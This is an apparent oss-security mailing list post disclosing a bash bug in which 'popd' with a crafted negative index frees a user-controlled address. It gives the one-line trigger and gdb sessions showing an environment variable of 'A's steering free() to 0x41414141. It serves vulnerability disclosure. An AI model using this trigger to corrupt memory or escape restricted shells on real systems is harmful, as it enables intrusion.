Date: Thu, 17 Nov 2016 12:04:49 -0500 From: Fernando Muñoz <fernando@...l-life.com> To: oss-security@...ts.openwall.com Cc: Chester Ramey <chet.ramey@...e.edu> Subject: bash - popd controlled free bash - popd controlled free ==================== popd can be tricked to free a user supplied address in the following way: $ popd +-111111 This could be used to bypass restricted shells (rsh) on some environments to cause use-after-free. This was already reported to bash devs and only considered a bug, if Mitre consider it could have a security impact, please assign a CVE. Details ====== $ gdb bash ... (gdb) r -c 'popd +-67372036' The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/bashinstrumentado/bash-4.3/bash -c 'popd +-67372036' Program received signal SIGSEGV, Segmentation fault. 0x0827f93a in popd_builtin (list=<optimized out>) at ./pushd.def:384 384 free (pushd_directory_list[i]); (gdb) print pushd_directory_list[i] Cannot access memory at address 0x10101010 ---- $ export AA=`perl -e 'print "A"x100000'` $ gdb ./bash ... (gdb) x/s *((char **)environ+13) 0xbffe75d4: "AA=", 'A' <repeats 197 times>... (gdb) run -c 'popd +-805281142' The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/bash/bash-4.3/bash -c 'popd +-805281142' Program received signal SIGSEGV, Segmentation fault. internal_free (mem=0x41414141, file=0x83fb36c "./pushd.def", line=384, flags=<optimized out>) at malloc.c:863 863 if (p->mh_alloc == ISMEMALIGN) - Fernando
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ